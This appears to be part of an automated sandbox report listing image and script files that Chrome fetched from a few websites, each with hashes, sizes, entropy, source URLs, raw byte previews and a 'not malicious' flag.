                                              SHA1:2D3CB40FDDC5CF2D969C7E97BAFA40158174BA10
                                              SHA-256:5C25FBD597ACB049F613C465BC94FCDEF9310B91F1F23C14794166608BA0E255
                                              SHA-512:0C96FF24E4D8F29998928CEC9AA9E344AE85D1AD63623A38DFDEBBC38127F985BC95CFCC3D61BACFECADEEF8613B71E16FF4FA62365F1B1E0914581865A2DA6A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/employee.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE........Z...............Ng...B......Pe.Nf...=...Ld..................r.Lc...........\...0K..r...V............Qh..z..J.........Qj.....MHh.....y.........F.........Pe...We.Mb....`w....ag.{..................4P.....K...1M..al..~....o....i}....Vi.......CS..c........,m..........{..6O......M.jtQk.Nh.....5...<J.e.C`...c..s._t^_...............=.q.....L]......'F.>W......^t.1K.......V.?M.....H\..........D............u..OOCj.V^..O.y.....cE^....fv........y....Nc..e..p....l|.....)B.x..eh.L....Zm....~._..(J..CQM]........'.}..D.......?..k...._j.a....EM....'.......w..............@.m.Js...NW........M......g...F..!<...P....c........xi....<U...........Nk.i..=@......[........x..B\......r..~.Mm.\t.[...i.......lc.)..c..G^..Q..e..i@...NIDATh.|.mH.....!3.!2I&3..y#.%..*U.FCb.bb...D.b..i.V46..Z-.D.^_.hm./.Z.B.U.V...R..m......-.{..../.m).I2a.._...<..w(L...PH....t:). P......L.T*...9..CCmKmkk.$.B|-.NRN.7..4.;.|.`<6.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11214
                                              Entropy (8bit):7.529455167459989
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwOk86JWJp+y67ZobKIrcMzE81TVH0Ll9qoMNgQUh/cF2:4YNg7mfey6ubrzMzti2
                                              MD5:1E91544DBD43C40539F1289DEC0882F7
                                              SHA1:DC94EE82CCF49A461A440817927A008504629DFA
                                              SHA-256:0495DD115904A13C3B6C266544755E21CEC3493A01C1B5A42813AE59C986FAC8
                                              SHA-512:8466E3955E4E7C011F47BAC852C1124A97C194F30C6F7C710D222A28437A620BCDA022EB90176A780F206D24983A77C903B4A20FDF01EBBAFBF6D8016D557FBE
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:dropped
                                              Size (bytes):11592
                                              Entropy (8bit):7.549240307306143
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwxFfiMsnRLmfp4IZEhpU+KOaOYtaisXTXGHVKJy0uKW:4YNg77aMsnIOIWhPxa0la2NW
                                              MD5:8CBEAE8B44DA1455C7B97BC364B35924
                                              SHA1:B7513EC87C6609C3DF5EDBB8E21BBF287F3FC5E4
                                              SHA-256:0F4BCE5573CE95380FD72807623F246D990DE1920A8F9A30F4DB056BCB191382
                                              SHA-512:F3B590AABCBF580267FF9C05211CD6B91AFCC62F5C9B9CC2C8383C8AB6FDBDF6A4A8E8A756BC47E900509BC85FB840C1A31FD373D34A5DD49BE2E656B40E49C6
                                              Malicious:false
                                              Reputation:low
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):60650
                                              Entropy (8bit):7.996363082625265
                                              Encrypted:true
                                              SSDEEP:1536:9PIAfjAHGV4jTjmxhwj1k05+e8QdQQ5hue01pu3Jt6sI:9PHjX43shwBLvzue80Z4sI
                                              MD5:69AE167C747F345E651D1EC4836D9FA1
                                              SHA1:27A3723AFF1E1ED4BFF337D15F48794A0E280DFA
                                              SHA-256:1D9C571293F766133558928D66EEEECDEB4FEBCB740101BBD3A709D0F0E12226
                                              SHA-512:3056619F23F17C4A9808A6198B825D20C254755E9A743C97B1ECFCB5A9BBEE3CDF258B27C8819A21B5A82504E49EE6A604DCFC74A42B0CFD2D280CCFBEBA430E
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/7/21d631acc2ddb0fc3dcf4f737c53f9da.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 n...02...*....>.j.R.%.3....p..en..a.&nu;.*.Y..*h._.W...&.b....?....C......f.Ts.../......y."....Q...K4......./Q....?....[.K.?...............d.........o._iO.~...}.?..qt#....;.H.O..../.E.g._.............6s?.....?..........y.g....ymz..O......=}..Ni......T....R..0..4w2.LH..Z...5.9"./.M9....`..*.Z....W..b.T...g...aC.8.u.t...n."..W.......>*..:1i...4.?X)o..*2S3......d............ZHS...4t..........c...$.Y..8.$...o...=.].c...0..Pd.a].... .\.x.J._bU...4.;....5....N.........FDO.'...,2..W....dH..>...(....6......P.....*g..}.LPl.%..b.v.`WR..~4..)).y04OFO..'..R....\:..\.#..~.x.........0.....g.......v.-...^...:.C.q....HLD........4..|.O'df.....6.&.H.T...&../.h..F..z....H.....'.]..I]..x,.[gvB[Z&..h 6!....>...]|.&."HG.^Mu..'h.k1*.vu....,....W.?R.D.t.4:..wQ%K....Kd..y>..`...}.._...k+...!zF4...H;l....[[.......bDM..[..)...(D!.;.l.I.B...n....H..$tzY..[.}~...8.4.6...eW...}......LR.o..."...C....2.....6.U..6}6..K.`t:re......d...enuZ.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (65451)
                                              Category:dropped
                                              Size (bytes):89475
                                              Entropy (8bit):5.289540431614111
                                              Encrypted:false
                                              SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakV:AYh8eip3huuf6IidlrvakdtQ47GKl
                                              MD5:12B69D0AE6C6F0C42942AE6DA2896E84
                                              SHA1:D2CC8D43CE1C854B1172E42B1209502AD563DB83
                                              SHA-256:6150A35C0F486C46CADF0E230E2AA159C7C23ECFBB5611B64EE3F25FCBFF341F
                                              SHA-512:A55F55D56899AB440EF0CAE17B28D5CC8F5B9766D1E9BC1A8AC6B89376924B476C1AB0C325497EB5D44AF41F4EBF8EEA236D87A36902244B8A3ECA54994B8711
                                              Malicious:false
                                              Reputation:low
                                              Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):13140
                                              Entropy (8bit):7.618572856945904
                                              Encrypted:false
                                              SSDEEP:384:4YNg7hKFFTBd+aj8QmfX8VFg4E58lCH8Mc:4YyYH9Xj8QmfX8VFg4E58R
                                              MD5:738FC79940F017D74E17A85BF41A18A3
                                              SHA1:8DD9A623923FF4BCF0A4E356309E2532F4ECB259
                                              SHA-256:3EB4334B9A60E2A6A3EFAA6FF6BC3390148392D73BD01C4AF5944E7C1B156108
                                              SHA-512:EC891652F7D78BB0C18178EA066239A214AD431F4250E5A7FE08855F62DD32C8E1066C2FDC4DFF084F8744F200EDA01F1A39D725D9C6B8FB0993051103B2AF9A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/35/b00a21b63bd72a197b67dd2d035a0cc2.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):16043
                                              Entropy (8bit):7.700760233335113
                                              Encrypted:false
                                              SSDEEP:384:4YNg7h5M58pSZ6zmqIWfzfwunqt6s5PgMPjgl9oK:4YyV57SqIuzfwunKLMlp
                                              MD5:A8CF128E669AB85F78112B10DA7319BA
                                              SHA1:DFD2A80E6B0AF83658FD8D0022AA19AC1F62C381
                                              SHA-256:D9B2970289EC272F3F46B435AC126F1CBACB9903B02507602882A6747A7343D3
                                              SHA-512:DA16CB4C2C57FF577CF0EFDC37E79E80C60976DAD64E5C4E04C0B66246E384E7EBA481B6F4D46B777CC27CC95CEBDD2938FEA6780AA4D8112717871F51E4FDCF
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/20/ba9a183d706bc7833b18810754cbc323.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 914 x 716, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):30889
                                              Entropy (8bit):7.935641229650575
                                              Encrypted:false
                                              SSDEEP:768:hOE3x2UymWHWEys9jH9Gl+rXg6Q4dBT+840ALvrr:hOyGiRs9jHfQA+Rxj
                                              MD5:F0AA43488EA16B18324764A63D76ADCF
                                              SHA1:2C0C6A8602F53382336EA8725448E1E61F356A7F
                                              SHA-256:185FA09861D622207376C9BCD642015B859AA6EA58FBC0D15377BB781D920792
                                              SHA-512:9A2105066EFBB1F37F393EA8459908515CFC6B51C500CF56AA0A13297927B849CB4F8D3575F8AFFF0A6C76521109E46EBEEFBF2BF29451201FE02BCA296C87C6
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR..............\}.....PLTELiq*9A...... 5>$7?$6?&9=%7>#6>......GW[ipr............N..................w.Z.......&&&...PPQ.....@i0.pqr.... <<=...ghi..........!,2._`a...k.s..K..b..........tRNS.2...;+..!..Z.3=.....pHYs............... .IDATx..].{.8.....m.z.L.<(.....v....}$..........6F....F..a`````````````````````````````````````````````````````````````````````````````````````````````````````````.R..l..V..h...ff.?.f..l.D..7.`.X7G.J.mi.J.5o..4X.V..B..J.mY[K.^$..d.7*i.4.1uy]9>.......uu.%.>........N.......q.Jv}.9g.lf..:..H...T..o.....o.}U.?4.....'.`....}..{N.J......B...AV..?.|....w...._...L./_...V..f.6.oV.............S.B.Y,..r...u.b,}.%.....L......._.r1.CW%...|....%T30.5....?.......d.#b..5.../...!J....~<...=..C.."._=.E.......|h...%!...7...GQ....J.q..o.,.hx.v.m..-....%..`.....zh...}.M...H......5s..B!i...B..#eW........_.......|......IB=..?....9.<n....>%....;o./.9yQ..........bn..&.............|C..<5...c........."..v..Bj1.o_.M.Z>6.3.../.......?..
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 100 x 100, 8-bit colormap, non-interlaced
                                              Category:downloaded
                                              Size (bytes):3296
                                              Entropy (8bit):7.912496602554403
                                              Encrypted:false
                                              SSDEEP:96:hYf8M6JPw7oUnESgynOH98C+E4JTuDFT4i:U6JPXGE2n2yowTu5T4i
                                              MD5:72BEB8A4C5CBA56600C47FC0E100F43E
                                              SHA1:D07CCE1D70C2B20D40B30F44E6752A6A7FCC918B
                                              SHA-256:374232827CF1216F04FAD2A364273F02214B4F7DB715928A1B60A4E3BFFB1098
                                              SHA-512:E5EB4A51013CC9D70ECB2505CD3F72C5EB8D751F62366451F6CA4748F8872DF2A0EABEA6E9A8DEDDB28A2CE82694DD1AF6360547FB4D5714360FB0DD94D3B088
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.tomsher.com/assets/images/menu/sms.png
                                              Preview:.PNG........IHDR...d...d.....G<ef....PLTE...................................._h..........h]......Vp...K|.fb.cf..../....B..<..\m.5.....'..Px.................\f.......l\.kt......Zj..........'...........}.....C~..........Oq............^Y.Vu............V...J....).....:..8........ip....i..`^.u.......IDATh..}W.\..AQT..B.P...IC.0.4.1......g..*..{=..vlt.Z.....9{.!.../....r&C0..1,[i7........i_....q.4...3..`YY.g...(.'.CfH.!+/......g:....g.B......rKi.,a..I..|J.O2...D.m.9.}..g.G..+r(.(...;...h.._....g.g.(<....2..No?.7a!l.pr...Y.V...d...r.{.#.......d...W.@\..9..~NcA8a.......1.B.B....%....4..1....k..|..S...I'.+..N.......D.:Y]..`_..o..o...r.......,$...F.......i..<.....J....y.X..u.. H...vq._]B.z..(0......XG>.h%+.. dm.U`H.f\_F.....gg._.G...b..,...Gx[....m.c56%..tY.`N..g..-.%.V..uu.`X..(....Rn.2.'.5G....z\+..U..d.c..8....u...32k)N%..%...~.g`.;.A..Z..zb+.].Pr_n3.)O..#.v..x......|1..}.....(...V.ZH...Ka....Y.'I8A.................m.r.B..........<.:.+.dd.c.J...|0....
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):10840
                                              Entropy (8bit):7.50003359940106
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKw3y+/T9ySaAk/Vm4ACI50RhfOZjjjjjjjjjjjjjjjhhH2RjU8Fy:4YNg7C+5ySaAuVCGWZjjjjjjjjjjjjjn
                                              MD5:1052C9707F62E4FFADE95C710A9221DA
                                              SHA1:2966DDE136E8F92991D042D61B477D0DB9576862
                                              SHA-256:7EAFCC4A4356DAA707823EE12A99AE8C09F4CBD8CF8D80435193494DC900B6EA
                                              SHA-512:81105B87ACC9C3B7F128CCCEAC1BEE21531F7E351794F38467A2848C1D605623D289DB86C48A47E3349D0EE44C99D2D4EBE46795796F8A1FDD4365E1F233162A
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/65/54796df6fd9d9b4297d270dd666eaf64.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:ASCII text, with very long lines (906)
                                              Category:downloaded
                                              Size (bytes):2675
                                              Entropy (8bit):5.3343911471610905
                                              Encrypted:false
                                              SSDEEP:48:D1+kqj0watiHZDYWcjPlmVoTimWyWCk5OhcKMy01FiSxvQhIKsoXwyRn:D1+Z0waH5PQlldO6KMSSxtrewyRn
                                              MD5:41E499E0599AB53FCFC0C2CACD6520BF
                                              SHA1:B79D0C9317CF5BE6F5353B02E07B842FB4B6E48D
                                              SHA-256:D0713279F74A920D9CF7143B4B34F69EF184BF2E0060CF3AC30AE2A993F7761D
                                              SHA-512:D3591133A3475D456A68B2DA8E916C516AC63774FD9F046668A6BA442E32784C59971EF27D1FD1D3365AB05B37F9F8AEBDA88531340BA93E53060577D3166738
                                              Malicious:false
                                              Reputation:low
                                              URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/search.js
                                              Preview:google.maps.__gjsload__('search', function(_){var wva=function(){},WB=function(a){this.setValues(a);_.Qi("search_impl")},yva=function(a){let b=_.nl,c=-1;a.tiles.forEach(e=>{e.zoom>c&&(b=e.fi,c=e.zoom)});if(c===-1)return[];const d=[];a.Du().forEach(e=>{e.a&&e.a.length>=2&&d.push(new xva(e,b,c))});return d},zva=function(a){const b=[];a.data.forEach(c=>{b.push(...yva(c))});return b};_.Ga(wva,_.rk);var Ava={["1"]:{}},xva=class{constructor(a,b,c){this.Jp=b;this.zoom=c;this.bounds=this.anchor=null;this.Eg=Ava;this.source=a;this.featureId=this.source.id||"0";this.infoWindowOffset=(this.source.io||[]).length===2?new google.maps.Point(this.source.io[0],this.source.io[1]):null}getAnchor(){if(!this.anchor){const a=1<<this.zoom;this.anchor=_.Rl(new _.cm((this.Jp.x*256+this.source.a[0])/a,(this.Jp.y*256+this.source.a[1])/a)).toJSON()}return this.anchor}getCompleteBounds(){return this.getBounds().reduce((a,.b)=>{a.extendByBounds(b);return a},_.Vl(0,0,0,0))}getBounds(){if(this.bounds===null){this.bou
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:JPEG image data, progressive, precision 8, 400x300, components 3
                                              Category:downloaded
                                              Size (bytes):12256
                                              Entropy (8bit):7.577923956488213
                                              Encrypted:false
                                              SSDEEP:192:4YNMtKwRie9H1JXG8JfATBWcZGbCQwrVqD9xLpOyS36NU490EDIyws:4YNg7R5l3HcZzRhM9dp/+49SI
                                              MD5:FD82374E9DB17F8399728273964C739A
                                              SHA1:EFD25C958BFDA9D562C396C0A1D91BEDFB20C104
                                              SHA-256:8B66B9E78471EC5BD907A40DFF04731107586F34F2E986E9B8E5739EB603BEB1
                                              SHA-512:ABA20221FD099165407A8506D20E9AAE21D03C6B36D1545E1C2DDAF435D591559E358AD19564F3F76C3F1866A3C99006016836498BA3A07ED8437A7DCAE1D041
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/partners/67/9527bc3860f61e6c7a6fbd278f5526e8.jpg
                                              Preview:.....XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1..........................
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:RIFF (little-endian) data, Web/P image
                                              Category:downloaded
                                              Size (bytes):43004
                                              Entropy (8bit):7.9941683407587085
                                              Encrypted:true
                                              SSDEEP:768:cPl7Ocs9EfMJsFkBXel4HP+xfgS4DbMZbclRw5O6QkeNXvCVoFpNNG6qr+1nnF:h79E0Zo4vIfonMJcXwDqXvCVmjG6qr+L
                                              MD5:6534F5D0696789962E2931E36D7240FD
                                              SHA1:E629247165D16283F18CC3A3E38665EC53707E74
                                              SHA-256:0D8B1A1EE5B8DB5C53F91B6D0E837573E8ED6A045E655B0896347A7285AFFCAB
                                              SHA-512:609598525CA9360D9ECB5C8174A04695ED580A6995E85C45CAFE93A94F133B54E1B3B70395930DE09105A7970602771C48AB2B7F0857171C40567FF7CF789FCC
                                              Malicious:false
                                              Reputation:low
                                              URL:https://www.citydiamondcontracting.com/uploads/projects/17/e7dd25a6640aa7bddcdaf018fbb5a7f2.webp
                                              Preview:RIFF....WEBPVP8X..............VP8 .........*....>.p.Q.2?...Js...en....i..g.....j_.8.w`....{.A.a.[j.?..>......>..?u....~Un..........o...w=.......................M......@...........]<.....=...'.>...9..;..^..D..Lx.......6'}a..=......%...-...$.R)a.|*....(H.e.....A^...|)..A.D........%......p.m.D.W..l..H..0...(0.+V+|.q..J..(k1..Bw...5F......J/.x.0J."....q.O?.b....SJY.\:K..L6.g.m..u..< .3...a.\F..[..-b[.:.,.w.Vu.i9..V.e....]}6..3.....M.<TI..i.u}......FdfXv..Ub.(.%.......;:t2An.."z....7.f.N...g|.fo`..Z....S|.\......5..U.......h...H....L=0.x..&E.. [9... ....B..0~.3.Z.u..0.R/.1...../.m\.@....q".dd.k.Dg.4.t*H.II.Z....2.....>.....7......".z.y;q....3e....o...1....P..-|/E2...r=.`.r.s4\.C..t')...s....[...J...b..}...=UA.~..GS..[.(.4.(3Q..9h...zBw...H.2R..".n....,`..e..K.v.]!..k.F<.F,..g-xLc...z.}.O7r......3..LK...Z.......l.........R.*..Zc...Wb...)..7..lw.C4.0.K......=(..L.0!Mv.FT........=....z.......<...u.j..sg...9H6.kU..j._..S.@.it.8....0....2.U.5-..V.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 1000 x 1000, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):136372
                                              Entropy (8bit):7.975260597649899
                                              Encrypted:false
                                              SSDEEP:3072:ocL5x71bJqs0l0N7vdtAaPQ9MvWltEX69skok:oILb0s0l0N7VtAagUKt
                                              MD5:31F87B036F7F4902D986EEAB3363AB00
                                              SHA1:11036556CECDE7340BBA53046CA1ECC74821B607
                                              SHA-256:6BD5B17045C182EB591BBB16F28C1B77509832235646F0CBB02DEB67F0B11C03
                                              SHA-512:7685BA42CC0BC17CB0FBC36302D26FE64E7F36A2D2BF516239476C281C29976268FD102BAE91536E81131B0F5000133F6DCAFFBCC918FCC68AD406A649F2B876
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR.............z}$.....PLTE...%..g^\+#.6-)@73...NC@...]QNk_\EAD...ndc..~...#*8EHV.{y.ro.=.xjh.2focb.D..9rg\Z.1n.K.PFDMECD;9:30/X.......vy.*(&Bm.^_kAm..;.......?;-VQCJE640%...*).lgTa]L....H.wp\....wd....k.].v.f..|X.pM.#.................U.SG6......xG)..gF.aA...[<....T5.}........r...d.....B'.(b.Wz..M/.T..\.p..lC'"W.3_......{..@\w`>&7i..K.K1......U9"~.......:}..Df..oGq.Q[l$Jl.N}9AB5Rl.Vz'9F.7Qq..cv.Qe{BKOSn..=_.~rCTc%BY-34.F.5J]..Dfl|.BoRVXsz._bi...eJ5.}c...nkj.........mS{wz..yT;.......y......)tRNS........'..):HaP9Vr..ti.~..l......}.).I....QIDATx...1.. ..A..?ZT.X*.*p.6.............[.^......2...(....7...a..n......JH......&..,#f.e..~@..BO.v..g*o.5...G...X=7.w.....O[.n...<.Cw+.P....._.f.a...c....N..A...a.;..R.w.M..*u..y..t........8...L..vjC.u..v.:.0...;.>..............r...........YCo...S..F"Zc..X.6.....%G]...s..h.[.7.w..V9.#O.$I.4..8.S.9....<....N.R..7.......F..8...\..eB.QT....?>.Q..?b..eD.D$^..w.......n./.....t...p.H
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 600 x 400, 8-bit colormap, non-interlaced
                                              Category:dropped
                                              Size (bytes):29932
                                              Entropy (8bit):7.982027935112831
                                              Encrypted:false
                                              SSDEEP:768:9Sqm2SiMPcYVIBO0tEVthceNS67KUQ/CKEHWbX:s6RMPcYVUmWeNKH/hHX
                                              MD5:F7F198973062D62390E7E9B958EEF566
                                              SHA1:4805E2F52E7DCC378F1BCD4A52D1EA0973D9A70F
                                              SHA-256:83FEC64C7415327B615FA94BD82F4B795C3CAF6350948AF2AA7F9C889BBA6B76
                                              SHA-512:E466ABE9638112DD7233DEB636A606832E733A60E0D828DBD8D4D5CD2F7A555B0368AAA06AAB440435BFB41D996E495EBC482FBF00DA8CFD40BBCE5765343C90
                                              Malicious:false
                                              Reputation:low
                                              Preview:.PNG........IHDR...X.........E.....VPLTELiq......000...!!!roi...;<;...@@@*** ===999LMMGGG...........................................W>......454EEE...[[[...%%%....m........oW5/0/NLC.>..nCWI,...*+............V>..L0....a9~2....C4..y`..{.w..{....hH83 D;+|..x...R.s.zR.W..tfQ.iA.[+j9.,"..T1.a..s..l.{..d..q............p..iFx..~T...e..c.nGSSO.f@7j....zL-.g>..X..u.. X...(d.\....tRNS........$..h8N.p.s.SR....pHYs............... .IDATx...[.X......{f.y..a..6A."i.$)...$@@.@ .S.n.u.R.../..@P...."(b...^{...?..'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y...'O.<y....c......o?....=k~.....?...$.....?C...<.p...a....N......_...F_.z....F_E_E.....go..?......~t........[...V..G<.......~...?4........9.psE...x...].......}.c^.h?....0.gw~{M.].....Z...h.....0.S.....<i....v....f.j..).jn.....>a.~....X..[/...........;.....k.<.......?...|....../..LzZ..9Y.yhBn...............$.
                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                              File Type:PNG image data, 155 x 80, 8-bit/color RGBA, non-interlaced
                                              Category:dropped
                                              Size (bytes):11680
                                              Entropy (8bit):7.972314942811284
                                              Encrypted:false
                                              SSDEEP:192:UIIHUCD4wa3SooILiXrGslh6mY0InZllQKW9RzEi7n9gn9/nvh+wCUG0iki+:K0wD/c+lvY0IZTQL9tv7k/npG+
                                              MD5:44E297A1FE992C64D2AD080D87C75ED4
                                              SHA1:07BB81ED3844ED777F9AF3049EEDFB5AB76A5181
                                              SHA-256:A74D9FCEA7DC9E0B830EEFB4BFB878F36A0B80FA4255C98C5701E5EB90F76BFD
                                              SHA-512:205F1A4215AD9CB3DFE25E227F39965941A3A55A02A2190AD0D938D3D6967D293A6DFF5C476538A8D561A5067071E4AF321EFF3F61B5D0730D31D602E2E3E428
                                              Malicious:false
                                              Reputation:low
